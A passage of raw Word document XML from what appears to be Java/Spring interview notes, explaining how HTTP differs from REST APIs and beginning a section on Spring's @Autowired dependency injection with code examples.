          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="655"/>
    </w:p>
    <w:p w14:paraId="31B253DF" w14:textId="37F7D895" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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Here’s the difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21486064" w14:textId="77777777" w:rsidR="004720F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361E7E">
          <v:rect id="_x0000_i2712" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A68FA7" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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HTTP (HyperText Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1E3C4"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rotocol</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for communication between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBB7D6"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t defines </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like GET, POST, PUT, DELETE, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F85A38"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Works over </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, typically on port 80 (HTTP) or 443 (HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9E924"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tateless, request-response based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461D8E6"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>GET /users/1 HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>It’s just a request using HTTP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CAF30D" w14:textId="77777777" w:rsidR="004720F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D3CC234">
          <v:rect id="_x0000_i2713" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB3188" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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REST API (Representational State Transfer API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10081942"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Design style/pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building web services </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>over HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDAD34"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Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like User, Order, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA6E86"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Returns </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON/XML</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EBADC"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REST is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not a protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP as a transport</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62335BE4"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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>REST API endpoint: GET /api/users/1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67592F17"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id": 1, "name": "John" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63706975" w14:textId="77777777" w:rsidR="004720F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F33D72">
          <v:rect id="_x0000_i2714" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AA11E" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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Key Differe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4"/>
        <w:gridCol w:w="1368"/>
        <w:gridCol w:w="3463"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="17029C7B" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6353E027" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23CB135C" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B26612" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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REST API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="43C8ED39" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A39C94A"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75EBF4F8"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rotocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7821CD2B"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rchitectural style</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="311E260C" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E416E44"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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2FCFE9"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Data transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68481A19"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Building web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="233398D2" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA66296"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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46211897"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HTTP methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB93BAF"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HTTP methods + resource-based URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4D8E98F9" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D7A67AA"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Data Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE7A127"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Not fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701E1814"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ually JSON or XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3EF8B83A" w14:textId="77777777" w:rsidTr="004720F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728F5CE6"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tateless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EBD899"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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E10E91"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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66C06F7F" w14:textId="77777777" w:rsidR="004720F4"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4894895">
          <v:rect id="_x0000_i2715" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F824096" w14:textId="77777777" w:rsidR="004720F4" w:rsidRPr="002C6305" w:rsidRDefault="004720F4"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onclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">HTTP is the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>underlying protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, while REST is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>style of designing APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that use HTTP to perform operations on </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CCB63" w14:textId="28DAB01F"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103C649">
          <v:rect id="_x0000_i2716" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B58C84" w14:textId="5135F4A4" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004847BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="656" w:name="_Toc196308136"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain @Autowired usage</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="656"/>
    </w:p>
    <w:p w14:paraId="2FE02977" w14:textId="775D867F" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Autowired in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A38C21"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 xml:space="preserve">@Autowired is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring. It tells Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inject the required dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically from the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4395EC" w14:textId="77777777" w:rsidR="008B2A0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824400">
          <v:rect id="_x0000_i2717" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB4098" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Where can @Autowired be used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349FA76"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On </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A426E"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On </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32734D55"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On </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>setter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A786B" w14:textId="77777777" w:rsidR="008B2A0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778825">
          <v:rect id="_x0000_i2718" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A5FBC" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C579859" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Field Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C5B48"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6C7E7"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEFAE39" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A05" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FBC195"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723E5B26"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UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3BC1D4"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887DA20" w14:textId="77777777" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A0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Constructor Injection (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7DDFB"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BD6A8"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UserService {</w:t>
